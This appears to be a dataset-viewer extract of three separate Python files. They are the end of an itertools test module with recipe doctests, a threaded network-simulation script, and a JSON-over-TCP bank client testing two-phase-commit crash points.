... print(list(map(operator.itemgetter(1), g)))
...
[1]
[4, 5, 6]
[10]
[15, 16, 17, 18]
[22]
[25, 26, 27, 28]
>>> def take(n, iterable):
... "Return first n items of the iterable as a list"
... return list(islice(iterable, n))
>>> def prepend(value, iterator):
... "Prepend a single value in front of an iterator"
... # prepend(1, [2, 3, 4]) -> 1 2 3 4
... return chain([value], iterator)
>>> def enumerate(iterable, start=0):
... return zip(count(start), iterable)
>>> def tabulate(function, start=0):
... "Return function(0), function(1), ..."
... return map(function, count(start))
>>> import collections
>>> def consume(iterator, n=None):
... "Advance the iterator n-steps ahead. If n is None, consume entirely."
... # Use functions that consume iterators at C speed.
... if n is None:
... # feed the entire iterator into a zero-length deque
... collections.deque(iterator, maxlen=0)
... else:
... # advance to the empty slice starting at position n
... next(islice(iterator, n, n), None)
>>> def nth(iterable, n, default=None):
... "Returns the nth item or a default value"
... return next(islice(iterable, n, None), default)
>>> def all_equal(iterable):
... "Returns True if all the elements are equal to each other"
... g = groupby(iterable)
... return next(g, True) and not next(g, False)
>>> def quantify(iterable, pred=bool):
... "Count how many times the predicate is true"
... return sum(map(pred, iterable))
>>> def padnone(iterable):
... "Returns the sequence elements and then returns None indefinitely"
... return chain(iterable, repeat(None))
>>> def ncycles(iterable, n):
... "Returns the sequence elements n times"
... return chain(*repeat(iterable, n))
>>> def dotproduct(vec1, vec2):
... return sum(map(operator.mul, vec1, vec2))
>>> def flatten(listOfLists):
... return list(chain.from_iterable(listOfLists))
>>> def repeatfunc(func, times=None, *args):
... "Repeat calls to func with specified arguments."
... " Example: repeatfunc(random.random)"
... if times is None:
... return starmap(func, repeat(args))
... else:
... return starmap(func, repeat(args, times))
>>> def pairwise(iterable):
... "s -> (s0,s1), (s1,s2), (s2, s3), ..."
... a, b = tee(iterable)
... try:
... next(b)
... except StopIteration:
... pass
... return zip(a, b)
>>> def grouper(n, iterable, fillvalue=None):
... "grouper(3, 'ABCDEFG', 'x') --> ABC DEF Gxx"
... args = [iter(iterable)] * n
... return zip_longest(*args, fillvalue=fillvalue)
>>> def roundrobin(*iterables):
... "roundrobin('ABC', 'D', 'EF') --> A D E B F C"
... # Recipe credited to George Sakkis
... pending = len(iterables)
... nexts = cycle(iter(it).__next__ for it in iterables)
... while pending:
... try:
... for next in nexts:
... yield next()
... except StopIteration:
... pending -= 1
... nexts = cycle(islice(nexts, pending))
>>> def powerset(iterable):
... "powerset([1,2,3]) --> () (1,) (2,) (3,) (1,2) (1,3) (2,3) (1,2,3)"
... s = list(iterable)
... return chain.from_iterable(combinations(s, r) for r in range(len(s)+1))
>>> def unique_everseen(iterable, key=None):
... "List unique elements, preserving order. Remember all elements ever seen."
... # unique_everseen('AAAABBBCCDAABBB') --> A B C D
... # unique_everseen('ABBCcAD', str.lower) --> A B C D
... seen = set()
... seen_add = seen.add
... if key is None:
... for element in iterable:
... if element not in seen:
... seen_add(element)
... yield element
... else:
... for element in iterable:
... k = key(element)
... if k not in seen:
... seen_add(k)
... yield element
>>> def unique_justseen(iterable, key=None):
... "List unique elements, preserving order. Remember only the element just seen."
... # unique_justseen('AAAABBBCCDAABBB') --> A B C D A B
... # unique_justseen('ABBCcAD', str.lower) --> A B C A D
... return map(next, map(itemgetter(1), groupby(iterable, key)))
>>> def first_true(iterable, default=False, pred=None):
... '''Returns the first true value in the iterable.
...
... If no true value is found, returns *default*
...
... If *pred* is not None, returns the first item
... for which pred(item) is true.
...
... '''
... # first_true([a,b,c], x) --> a or b or c or x
... # first_true([a,b], x, f) --> a if f(a) else b if f(b) else x
... return next(filter(pred, iterable), default)
>>> def nth_combination(iterable, r, index):
... 'Equivalent to list(combinations(iterable, r))[index]'
... pool = tuple(iterable)
... n = len(pool)
... if r < 0 or r > n:
... raise ValueError
... c = 1
... k = min(r, n-r)
... for i in range(1, k+1):
... c = c * (n - k + i) // i
... if index < 0:
... index += c
... if index < 0 or index >= c:
... raise IndexError
... result = []
... while r:
... c, n, r = c*r//n, n-1, r-1
... while index >= c:
... index -= c
... c, n = c*(n-r)//n, n-1
... result.append(pool[-1-n])
... return tuple(result)
This is not part of the examples but it tests to make sure the definitions
perform as purported.
>>> take(10, count())
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
>>> list(prepend(1, [2, 3, 4]))
[1, 2, 3, 4]
>>> list(enumerate('abc'))
[(0, 'a'), (1, 'b'), (2, 'c')]
>>> list(islice(tabulate(lambda x: 2*x), 4))
[0, 2, 4, 6]
>>> it = iter(range(10))
>>> consume(it, 3)
>>> next(it)
3
>>> consume(it)
>>> next(it, 'Done')
'Done'
>>> nth('abcde', 3)
'd'
>>> nth('abcde', 9) is None
True
>>> [all_equal(s) for s in ('', 'A', 'AAAA', 'AAAB', 'AAABA')]
[True, True, True, False, False]
>>> quantify(range(99), lambda x: x%2==0)
50
>>> a = [[1, 2, 3], [4, 5, 6]]
>>> flatten(a)
[1, 2, 3, 4, 5, 6]
>>> list(repeatfunc(pow, 5, 2, 3))
[8, 8, 8, 8, 8]
>>> import random
>>> take(5, map(int, repeatfunc(random.random)))
[0, 0, 0, 0, 0]
>>> list(pairwise('abcd'))
[('a', 'b'), ('b', 'c'), ('c', 'd')]
>>> list(pairwise([]))
[]
>>> list(pairwise('a'))
[]
>>> list(islice(padnone('abc'), 0, 6))
['a', 'b', 'c', None, None, None]
>>> list(ncycles('abc', 3))
['a', 'b', 'c', 'a', 'b', 'c', 'a', 'b', 'c']
>>> dotproduct([1,2,3], [4,5,6])
32
>>> list(grouper(3, 'abcdefg', 'x'))
[('a', 'b', 'c'), ('d', 'e', 'f'), ('g', 'x', 'x')]
>>> list(roundrobin('abc', 'd', 'ef'))
['a', 'd', 'e', 'b', 'f', 'c']
>>> list(powerset([1,2,3]))
[(), (1,), (2,), (3,), (1, 2), (1, 3), (2, 3), (1, 2, 3)]
>>> all(len(list(powerset(range(n)))) == 2**n for n in range(18))
True
>>> list(powerset('abcde')) == sorted(sorted(set(powerset('abcde'))), key=len)
True
>>> list(unique_everseen('AAAABBBCCDAABBB'))
['A', 'B', 'C', 'D']
>>> list(unique_everseen('ABBCcAD', str.lower))
['A', 'B', 'C', 'D']
>>> list(unique_justseen('AAAABBBCCDAABBB'))
['A', 'B', 'C', 'D', 'A', 'B']
>>> list(unique_justseen('ABBCcAD', str.lower))
['A', 'B', 'C', 'A', 'D']
>>> first_true('ABC0DEF1', '9', str.isdigit)
'0'
>>> population = 'ABCDEFGH'
>>> for r in range(len(population) + 1):
... seq = list(combinations(population, r))
... for i in range(len(seq)):
... assert nth_combination(population, r, i) == seq[i]
... for i in range(-len(seq), 0):
... assert nth_combination(population, r, i) == seq[i]
"""
__test__ = {'libreftest' : libreftest}
def test_main(verbose=None):
test_classes = (TestBasicOps, TestVariousIteratorArgs, TestGC,
RegressionTests, LengthTransparency,
SubclassWithKwargsTest, TestExamples,
TestPurePythonRoughEquivalents,
SizeofTest)
support.run_unittest(*test_classes)
# verify reference counting
if verbose and hasattr(sys, "gettotalrefcount"):
import gc
counts = [None] * 5
for i in range(len(counts)):
support.run_unittest(*test_classes)
gc.collect()
counts[i] = sys.gettotalrefcount()
print(counts)
# TODO: RUSTPYTHON this hangs or is very slow
# doctest the examples in the library reference
# support.run_doctest(sys.modules[__name__], verbose)
if __name__ == "__main__":
test_main(verbose=True)
|
simulation.py
|
'''
Created on Oct 12, 2016
@author: mwittie
'''
import network
import link
import threading
from time import sleep
##configuration parameters
router_queue_size = 0 #0 means unlimited
simulation_time = 1 #give the network sufficient time to transfer all packets before quitting
if __name__ == '__main__':
object_L = [] #keeps track of objects, so we can kill their threads
#create network nodes
client = network.Host(1)
object_L.append(client)
server = network.Host(2)
object_L.append(server)
router_a = network.Router(name='A', intf_count=1, max_queue_size=router_queue_size)
object_L.append(router_a)
#create a Link Layer to keep track of links between network nodes
link_layer = link.LinkLayer()
object_L.append(link_layer)
#add all the links
#link parameters: from_node, from_intf_num, to_node, to_intf_num, mtu
link_layer.add_link(link.Link(client, 0, router_a, 0, 50))
link_layer.add_link(link.Link(router_a, 0, server, 0, 30))
#start all the objects
thread_L = []
thread_L.append(threading.Thread(name=client.__str__(), target=client.run))
thread_L.append(threading.Thread(name=server.__str__(), target=server.run))
thread_L.append(threading.Thread(name=router_a.__str__(), target=router_a.run))
thread_L.append(threading.Thread(name="Network", target=link_layer.run))
for t in thread_L:
t.start()
#create some send events
for i in range(1):
client.udt_send(2, 'Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.')
#give the network sufficient time to transfer all packets before quitting
sleep(simulation_time)
#join all threads
for o in object_L:
o.stop = True
for t in thread_L:
t.join()
print("All simulation threads joined")
# writes to host periodically
|
control.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
客户端崩溃时刻:
1. 发送业务请求之前 -- 正常
2. 发送业务请求之后,第一阶段 recv 之前 -- 正常
3. 第一阶段 recv 之后、ack 之前 -- 正常
4. 第一阶段 ack 之后、第二阶段 recv 前 -- 无解,数据可能不一致,二阶段提交协议弊端
5. 第二阶段 recv 后、ack 之前 -- 未实现,根据日志可恢复(本地事务范围)
6. 第二阶段 ack 之后, recv result 之前 -- 本地事务范围
7. recv result 之后 -- 显示问题
"""
# ------ TEST POINT ------
TEST_POINT_1 = False # before request
TEST_POINT_2 = False # before first recv
TEST_POINT_3 = False # before first send
TEST_POINT_4 = False # before second recv
TEST_POINT_5 = False # before second send
TEST_POINT_6 = False # before result recv
TEST_POINT_7 = False # after result recv
# --------- END ----------
import sys
import json
import time
import math
import signal
import socket
import logging
from threading import Thread
__TIMEOUT__ = 10
log_fmt = '[%(asctime)s] p%(process)s {%(pathname)s:%(lineno)d} %(levelname)s - %(message)s'
date_fmt = '%m-%d %H:%M:%S'
logging.basicConfig(filename='control.log',level=logging.DEBUG, format=log_fmt, datefmt=date_fmt)
class Control:
def __init__(self, **kw):
"""
kw -- dictionary, {'bankcard': bankcard, 'password': password, 'address': address, 'port': port}
"""
signal.signal(signal.SIGCHLD, signal.SIG_IGN) # 处理僵尸进程
self.login_info = kw
self.address = (kw['address'], int(kw['port']))
def login(self):
"""
return value:
result = {
"status": bool,
"msg": message
}
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(__TIMEOUT__)
msg = {'type': '00',
'bankcard': self.login_info['bankcard'],
'password': self.login_info['password']
}
payload = json.dumps(msg).encode('utf-8')
result = dict()
try:
s.connect(self.address)
s.sendall(payload)
buf = s.recv(1024).decode('utf-8')
s.close()
logging.debug("login recv: {}".format(buf))
if buf == '': # means server closed
result['status'] = False
result['msg'] = 'server closed'
else:
reply = json.loads(buf)
if reply['status'] == 0:
self.login_info['token'] = reply['token']
self.login_info['deadline'] = int(reply['deadline'])
result['status'] = True
#self.t_renewal = Thread(target=self.renewal_token)
#self.t_renewal.start()
else:
result['status'] = False
result['msg'] = reply['msg']
except Exception as e: # 捕获所有的异常 https://python3-cookbook.readthedocs.io/zh_CN/latest/c14/p07_catching_all_exceptions.html
result['status'] = False
result['msg'] = e
finally:
logging.debug("login result: {}".format(str(result)))
return result
def renewal_token(self):
logging.debug("------ renewal thread start ------")
msg = {'type': '10', 'bankcard': self.login_info['bankcard'], 'token': self.login_info['token']}
payload = json.dumps(msg).encode('utf-8')
while True:
time.sleep(60)
logging.debug("------ try to renewal ------")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(__TIMEOUT__)
date = math.floor(time.time())
if (self.login_info['deadline']-date) < 300 and \
(self.login_info['deadline']-date):
try:
s.connect(self.address)
s.sendall(payload)
buf = s.recv(1024).decode('utf-8')
s.close()
if buf == '':
logging.info("renewal fail.")
else:
msg = json.loads(buf)
if msg['status'] == 0 and msg['token'] == self.login_info['token']:
self.login_info['deadline'] = int(msg['deadline'])
logging.info("renewal success.")
else:
logging.info("renewal fail. token has some question.")
except Exception as e:
logging.info("renewal fail. {}".format(e))
def stop(self):
"""
when client exit, kill renewal thread
"""
self.t_renewal.exit()
def deposit(self, amount):
"""
return value:
result = {
"status": bool,
"msg": message
}
"""
if amount <= 0:
pass # 忽略无效金额
msg = { 'type': '20',
'token': self.login_info['token'],
'bankcard': self.login_info['bankcard'],
"amount": int(amount)
}
return self._operation(msg)
def withdraw(self, amount):
"""
return value:
result = {
"status": bool,
"msg": message
}
"""
if amount <= 0:
pass # 忽略无效金额
msg = { 'type': '30',
'token': self.login_info['token'],
'bankcard': self.login_info['bankcard'],
"amount": int(amount)
}
return self._operation(msg)
def transfer(self, amount, transferred):
"""
return value:
result = {
"status": bool,
"msg": message
}
"""
if amount <= 0:
pass # 忽略无效金额
msg = { "type": '40',
"token": self.login_info['token'],
"bankcard": self.login_info['bankcard'],
"transferred": str(transferred),
"amount": int(amount)
}
return self._operation(msg)
def _operation(self, msg):
"""
return value:
result = {
"status": bool,
"msg": message
}
"""
result = dict()
try:
payload = json.dumps(msg).encode('utf-8')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(__TIMEOUT__)
s.connect(self.address)
# test point 1
if TEST_POINT_1 == True:
logging.info("TEST_POINT_1 == True, exit")
exit(0)
s.sendall(payload)
if TEST_POINT_2 == True:
logging.info("TEST_POINT_2 == True, exit")
exit(0)
buf = s.recv(1024).decode('utf-8')
if buf == '': # 连接被关闭
result['status'] = False # 事务执行失败
result['msg'] = 'socket closed'
else:
reply = json.loads(buf)
if reply.get('sequence') is None:
result['status'] = False
result['msg'] = reply['msg']
else:
self._transaction(s, reply) # ignore return
# test point 6
if TEST_POINT_6 == True:
logging.info("TEST_POINT_6 == True, exit")
exit(0)
buf = s.recv(1024).decode('utf-8')
logging.debug("deposite result: {}".format(buf))
# test point 7
if TEST_POINT_7 == True:
logging.info("TEST_POINT_7 == True, exit")
exit(0)
if buf == '': # 连接被关闭
result['msg'] = 'socket close'
result['status'] = False
else:
result = json.loads(buf)
if result['status'] == 0:
result['status'] = True
else:
result['status'] = False
except Exception as e:
result['status'] = False
result['msg'] = e
finally:
return result
def _transaction(self, s, reply):
logging.info("------ Transaction Start ------")
result = dict()
try:
# first stage -- enquire or close socket or can't operation transaction
logging.debug("first stage from coordinaotr: {}".format(str(reply)))
sequence = reply['sequence'] # 标记事务序列
# 执行本地事务操作,但不释放资源
logging.info("redo, msg: {}".format(str(reply['msg'])))
ack = {'sequence': sequence, 'status': 0} # 回复
payload = json.dumps(ack).encode('utf-8')
if TEST_POINT_3 == True:
logging.info("TEST_POINT_3 == True, exit")
exit(0)
s.sendall(payload)
logging.info("{} first stage completes.".format(sequence))
# second stage -- commit or rollback
if TEST_POINT_4 == True:
logging.info("TEST_POINT_4 == True, exit")
exit(0)
buf = s.recv(1024).decode('utf-8')
logging.debug("second stage from coordinator: {}".format(buf))
if buf == "": # 连接被关闭
result['status'] = False # 事务执行失败
result['msg'] = 'socket closed'
# roolback
else:
reply = json.loads(buf)
if reply['sequence'] == sequence and reply['status'] == 0:
# 执行成功,释放资源
result['status'] = True
result['msg'] = 'transaction success'
else:
# 回滚操作,释放资源
result['status'] = False
result['msg'] = 'transaction fail'
if TEST_POINT_5 == True:
logging.info("TEST_POINT_% == True, exit")
exit(0)
s.sendall(payload)
logging.info("{} second stage completes.".format(sequence))
except Exception as e:
result['status'] = False
result['msg'] = e
finally:
logging.info("------ Transaction End ------")
logging.debug("transaction result: {}".format(str(result)))
return result
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.